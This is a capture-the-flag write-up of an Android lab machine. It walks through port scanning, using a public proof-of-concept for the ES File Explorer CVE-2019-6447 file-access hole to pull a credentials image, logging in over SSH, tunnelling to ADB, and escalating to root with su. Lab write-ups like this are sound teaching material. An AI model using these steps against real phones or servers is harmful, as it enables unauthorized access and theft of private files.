Again, we start with AutoRecon: sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.247
Sidenote: newer versions of Kali no longer run as root by default, so sudo is required for scans that need raw sockets, which includes the UDP port scan AutoRecon runs.
The major ports to look at right now are SSH (TCP 2222), TCP 5555 (filtered; nmap lists it as freeciv by port number, but it is the ADB port), and an HTTP service on TCP 59777 that nmap labels Bukkit JSONAPI. Gobuster found several pages and directories that could be interesting.
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.247:59777
Researching 5555 and 59777 leads to ES File Explorer, its open-port vulnerability (CVE-2019-6447: the app listens on TCP 59777 and answers unauthenticated JSON commands over HTTP, including file listing and file download), and a public proof-of-concept. Two great resources for those two ports are:
Clone the exploit repo and check the README.md for the commands it supports. To save time, the ones we need are:
python3 poc.py --ip=10.10.10.247 -c listPics (list the pictures on the device), then
python3 poc.py --ip=10.10.10.247 -g /storage/emulated/0/DCIM/creds.jpg (download the interesting one)
Open creds.jpg and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that. With those credentials we can SSH in on port 2222.
This is obviously a phone, in case the ES File Explorer wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which if I recall is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly on Android, AND we still have to find the user.txt flag. Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it!
:/sdcard $ cat user.txt
Now, if you recall, port 5555 (ADB) was filtered from the outside, but adbd is still listening on the phone itself, so what if we use SSH port forwarding to reach it? The -L option below binds local port 5555 and tunnels it through the SSH session to port 5555 on the phone's own loopback interface:
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
Then we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.
└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555
└─$ adb devices
List of devices attached
Notice there are two "devices" attached for what is really one phone: adb's emulator auto-discovery also picks up the forwarded localhost port as an emulator console pair, so the same device appears twice. We need to specify with -s which one we want adb to open the shell on.
└─$ adb -s localhost:5555 shell
x86_64:/ $ whoami
x86_64:/ $ su
:/ # whoami
Gotcha!!! Now we search for root.txt and this phone will be toast.
:/ # find / -name root.txt
:/data # cat root.txt
This was a completely different style of box/phone/thing.... But hey, another one down!